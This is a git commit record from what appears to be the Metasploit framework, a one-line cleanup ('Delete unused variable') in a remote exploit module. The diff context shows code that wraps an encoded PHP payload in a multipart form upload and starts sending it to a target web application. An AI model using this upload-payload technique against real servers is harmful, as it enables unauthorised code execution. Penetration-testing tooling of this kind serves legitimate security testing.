Delete unused variable

bug/bundler_fix
jvazquez-r7 2014-12-12 12:03:32 -06:00
parent 810bf598b1
commit 98dca6161c
1 changed files with 0 additions and 1 deletions

View File

@ -48,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
post_data = data.to_s
print_status("#{peer} - Uploading payload")
res = send_request_cgi(